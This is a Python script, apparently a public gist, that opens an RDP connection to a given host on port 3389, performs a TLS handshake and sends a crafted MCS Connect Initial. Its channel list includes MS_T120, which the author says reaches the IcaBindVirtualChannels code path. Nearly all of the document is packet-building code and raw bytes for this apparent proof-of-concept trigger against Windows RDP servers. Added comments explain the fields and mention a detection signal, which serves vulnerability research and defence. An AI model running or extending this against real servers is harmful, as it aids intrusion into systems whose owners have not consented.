
@n1xbyte
Created May 19, 2019 04:01
import socket, sys
from OpenSSL import SSL
from impacket.structure import Structure
class TPKT(Structure):
    """TPKT framing header wrapping one X.224 TPDU.

    ``Length`` is the total frame size (4-byte header plus payload) and is
    computed from ``TPDU`` on serialization; when parsing, ``_TPDU`` sizes
    the payload from ``Length``.
    """
    # NOTE(review): impacket's Structure serializes the fields declared in
    # ``commonHdr`` / ``structure``; whether an attribute named ``header`` is
    # honoured depends on the impacket version in use — confirm, otherwise
    # getData() would emit nothing for this class (same for TPDU and CR_TPDU).
    header = (
        ('Version','B=3'),                       # TPKT version, defaults to 3
        ('Reserved','B=0'),
        ('Length','>H=len(TPDU)+4'),             # big-endian, includes the 4-byte header
        ('_TPDU','_-TPDU','self["Length"]-4'),   # payload length when parsing
        ('TPDU',':=""'),                         # raw X.224 TPDU bytes
    )
class TPDU(Structure):
    """X.224 TPDU: length indicator, code byte, then a variable part.

    ``LengthIndicator`` counts the ``Code`` byte plus ``VariablePart`` and is
    computed on serialization. ``Code`` selects the TPDU type; main() sets it
    to 0xe0 for a Connection Request.
    """
    header = (
        ('LengthIndicator','B=len(VariablePart)+1'),
        ('Code','B=0'),
        ('VariablePart',':=""'),   # type-specific payload (here: CR_TPDU + RDP_NEG_REQ)
    )
class CR_TPDU(Structure):
    """Fixed part of an X.224 Connection Request plus the RDP negotiation header.

    ``DST-REF``/``SRC-REF``/``CLASS-OPTION`` are the X.224 CR fields; ``Type``,
    ``Flags`` and ``Length`` are the 4-byte header of the RDP negotiation
    structure that subclasses extend (see RDP_NEG_REQ). ``Length`` defaults
    to 8, the size of header plus the 4-byte ``requestedProtocols`` field.
    """
    header = (
        ('DST-REF','<H=0'),
        ('SRC-REF','<H=0'),
        ('CLASS-OPTION','B=0'),
        ('Type','B=0'),          # negotiation structure type; main() sets 1
        ('Flags','B=0'),
        ('Length','<H=8'),       # total negotiation structure length
    )
class RDP_NEG_REQ(CR_TPDU):
    """RDP negotiation request appended to the CR_TPDU header.

    ``requestedProtocols`` is the little-endian bitmask of security protocols
    the client is willing to use; main() sets it to 1, which in MS-RDPBCGR
    selects TLS (PROTOCOL_SSL).
    """
    structure = (
        ('requestedProtocols','<L'),
    )
def main(host):
    """Connect to ``host``:3389 and send one hard-coded MCS Connect Initial.

    Flow: an X.224 Connection Request carrying an RDP negotiation request
    (TLS requested) is sent in the clear, a TLS handshake is performed over
    the same socket, then a fixed MCS Connect Initial is sent whose CS_NET
    block lists four channel definitions, the first named MS_T120. Both
    server responses are read into ``pkt`` but never inspected, and neither
    the socket nor the TLS connection is closed (the process exits after).

    Args:
        host: hostname or IP address of the RDP server.
    """
    # --- X.224 Connection Request (cleartext) --------------------------------
    tpkt = TPKT()
    tpdu = TPDU()
    rdp_neg = RDP_NEG_REQ()
    rdp_neg['Type'] = 1                # negotiation request (TYPE_RDP_NEG_REQ)
    rdp_neg['requestedProtocols'] = 1  # ask for TLS security (PROTOCOL_SSL)
    tpdu['VariablePart'] = rdp_neg.getData()
    tpdu['Code'] = 0xe0                # X.224 Connection Request (CR) code
    tpkt['TPDU'] = tpdu.getData()
    # Socket send
    s = socket.socket()
    s.connect((host,3389))
    s.sendall(tpkt.getData())
    # The Connection Confirm is received but not checked, so a server that
    # declines TLS is only noticed when do_handshake() below fails.
    pkt = s.recv(8192)
    # TLS handshake (Version 1 not necessary but I set up packet captures for it)
    # TLSv1_METHOD pins TLS 1.0; a server with TLS 1.0 disabled fails the
    # handshake here.
    ctx = SSL.Context(SSL.TLSv1_METHOD)
    tls = SSL.Connection(ctx,s)
    tls.set_connect_state()
    tls.do_handshake()
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr
    # The 7 bytes spell "MS_T120".
    # NOTE(review): ordinary clients are not expected to name this channel in
    # their CS_NET list, so a client Connect Initial containing it is a useful
    # network-detection signal — confirm against MS-RDPBCGR.
    MS_T120 = "\x4d\x53\x5f\x54\x31\x32\x30" #This gets you to code path in IcaBindVirtualChannels
    # MCS Connect Initial as one implicit string-literal concatenation; the
    # ``+ MS_T120 +`` splice below is the only runtime join. The literals are
    # used as raw bytes, which presumes Python 2 str semantics — under
    # Python 3 these are str, not bytes (TODO confirm target interpreter).
    buf = (
        #---------------------------------------------------------------------------
        "\x02\xf0\x80\x7f\x65\x82\x01\xc2\x04"
        "\x01\x01\x04\x01\x01\x01\x01\xff"
        #---------------------------------------------------------------------------
        # mcsCi variable
        "\x30\x19"
        "\x02\x01\x22" #MaxChannelIDs
        "\x02\x01\x02" #MaxUserIDs
        "\x02\x01\x00" #MaxTokenIDs
        "\x02\x01\x01" #Priorities
        "\x02\x01\x00" #MinThroughput
        "\x02\x01\x01" #MaxHeight
        "\x02\x02\xff\xff" #MaxMCSPDUSize
        "\x02\x01\x02" #ProtocolVersion
        #---------------------------------------------------------------------------
        # mcsCi variable
        "\x30\x19"
        "\x02\x01\x01" #MaxChannelIDs
        "\x02\x01\x01" #MaxUserIDs
        "\x02\x01\x01" #MaxTokenIDs
        "\x02\x01\x01" #Priorities
        "\x02\x01\x00" #MinThroughput
        "\x02\x01\x01" #MaxHeight
        "\x02\x02\x04\x20" #MaxMCSPDUSize
        "\x02\x01\x02" #ProtocolVersion
        #---------------------------------------------------------------------------
        # mcsCi variable
        "\x30\x1c"
        "\x02\x02\xff\xff" #MaxChannelIDs
        "\x02\x02\xfc\x17" #MaxUserIDs
        "\x02\x02\xff\xff" #MaxTokenIDs
        "\x02\x01\x01" #Priorities
        "\x02\x01\x00" #MinThroughput
        "\x02\x01\x01" #MaxHeight
        "\x02\x02\xff\xff" #MaxMCSPDUSize
        "\x02\x01\x02" #ProtocolVersion
        #---------------------------------------------------------------------------
        # gccCCrq variable
        "\x04\x82\x01\x61"
        "\x00\x05\x00\x14"
        "\x7c\x00\x01\x81"
        "\x58\x00\x08\x00"
        "\x10\x00\x01\xc0"
        "\x00\x44\x75\x63"
        "\x61\x81\x4a"
        #---------------------------------------------------------------------------
        # CS_CORE
        "\x01\xc0" # Type
        "\xea\x00" # Length
        "\x0a\x00\x08\x00" # Version
        "\x80\x07" # DesktopWidth
        "\x38\x04" # DesktopHeight
        "\x01\xca" # ColorDepth
        "\x03\xaa" # SASSequence
        "\x09\x04\x00\x00" # KeyboardLayout
        "\xee\x42\x00\x00" # BuildNumber
        "\x44\x00\x45\x00"#------
        "\x53\x00\x4b\x00"# |
        "\x54\x00\x4f\x00"# |
        "\x50\x00\x2d\x00"# |
        "\x46\x00\x38\x00"# |-- ClientName
        "\x34\x00\x30\x00"# |
        "\x47\x00\x49\x00"# |
        "\x4b\x00\x00\x00"#------
        "\x04\x00\x00\x00" # KeyboardType
        "\x00\x00\x00\x00" # KeyboardSub
        "\x0c\x00\x00\x00" # KeyboardFunc
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"#---
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"# |
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"# |--imeFileName
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"#---
        "\x01\xca" # PostBeta2ColorDepth
        "\x01\x00" # ProductID
        "\x00\x00\x00\x00" # SerialNumber
        "\x18\x00" # HighColorDepth
        "\x0f\x00" # SupportedColorDepth
        "\xaf\x07" # EarlyCapabilityFlags
        "\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00\x2d"#--
        "\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00\x39"# |
        "\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d\x00"# |-- ClientProductID
        "\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42\x07"# |
        "\x00\x01\x00\x00\x00\x56\x02\x00\x00\x50\x01\x00\x00\x00\x00\x64\x00"#---
        "\x00" # ConnType
        "\x00" # Padding
        "\x64\x00\x00\x00" # ServerProtocol
        "\x04\xc0\x0c\x00" # PhysWidth
        "\x15\x00\x00\x00" # PhysHeight
        "\x00\x00\x00\x00" # Some Opt Field? idk
        #---------------------------------------------------------------------------
        # CS_SECURITY
        "\x02\xc0" # Type
        "\x0c\x00" # Length
        "\x1b\x00\x00\x00" # EncryptionMethod
        "\x00\x00\x00\x00" # Extension
        #---------------------------------------------------------------------------
        # CS_NET - look in to CHANNEL_DEFs?
        # Length 0x38 = 56 = 8 bytes (Type, Length, ChannelCount) + 4 x 12-byte
        # channel definitions (8-byte name + 4-byte options), matching the
        # four entries below.
        # 1st channel
        "\x03\xc0" # Name
        "\x38\x00" # Length
        "\x04\x00\x00\x00" # ChannelCount - "MAX OF 31"
        + MS_T120 + "\x00" # Name (7 Chars + \x00 terminator)
        "\x0f\x00\x80\x80" # Options
        #-- -- -- -- -- -- -- -- -- --
        # 2nd channel
        "\x72\x64\x70\x73\x6e\x64\x00\x00"
        "\x0f\x00\x00\xc0"
        #-- -- -- -- -- -- -- -- -- --
        # 3rd channel
        "\x63\x6c\x69\x70\x72\x64\x72\x00"
        "\x00\x00\xa0\xc0"
        #-- -- -- -- -- -- -- -- -- --
        # 4th channel
        "\x64\x72\x64\x79\x6e\x76\x63\x00"
        "\x00\x00\x80\xc0"
        #---------------------------------------------------------------------------
        # CS_MCS_MSGCHANNEL
        "\x06\xc0" # Type
        "\x08\x00" # Length
        "\x00\x00\x00\x00" # Flags
        #---------------------------------------------------------------------------
        # CS_MULTITRANSPORT
        "\x0a\xc0" # Type
        "\x08\x00" # Length
        "\x05\x03\x00\x00" # Flags (All Set)
        #---------------------------------------------------------------------------
        # Additional checked out
        # CS_CLUSTER
        # CS_MONITOR
        # CS_MONITOR_EX
        # CS_MCS_MSGCHANNEL
        # CS_MULTITRANSPORT
        ##############################################################################
        ############################## Server Response ###############################
        ##############################################################################
        # Reference capture of a server's Connect Response, kept for comparison;
        # nothing below is sent.
        # "\x03\x00\x00\x6c\x02\xf0\x80\x7f\x66\x62\x0a\x01\x00\x02\x01\x00"
        # "\x30\x1a\x02\x01\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02\x01"
        # "\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02\x01\x02\x04\x3e\x00\x05"
        # "\x00\x14\x7c\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0\x00\x4d"
        # "\x63\x44\x6e\x28"
        #---------------------------------------------------------------------------
        # SC_CORE
        # "\x01\x0c" Type
        # "\x0c\x00" Length
        # "\x04\x00\x08\x00" RDP 10.1 servers
        # "\x01\x00\x00\x00" RNS_UD_SC_EDGE_ACTIONS_SUPPORTED_V1
        #---------------------------------------------------------------------------
        # SC_NET
        # "\x03\x0c" Type
        # "\x10\x00" Length
        # "\xeb\x03" ChannelID
        # "\x04\x00" ChannelCount
        # "\xec\x03" -----
        # "\xed\x03" |_ ChannelIDArray
        # "\xee\x03" |
        # "\xef\x03" -----
        #---------------------------------------------------------------------------
        # SC_SECURITY
        # "\x02\x0c" Type
        # "\x0c\x00" Length
        # "\x00\x00\x00\x00" NoEncryption
        # "\x00\x00\x00\x00" NullEncryptionLevel
    )
    # --- MCS Connect Initial over TLS ----------------------------------------
    # A fresh TPKT is used so Length is recomputed for the new payload.
    tpkt = TPKT()
    tpkt['TPDU'] = buf
    tls.sendall(tpkt.getData())
    # Connect Response read but not parsed; neither tls nor s is closed here.
    pkt = tls.recv(8192)
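if __name__ == '__main__':
    # Script entry point: the target host is the single positional argument.
    # Fail with a usage line instead of an IndexError when it is missing;
    # extra arguments are still ignored as before.
    if len(sys.argv) < 2:
        sys.exit('usage: %s <host>' % sys.argv[0])
    main(sys.argv[1])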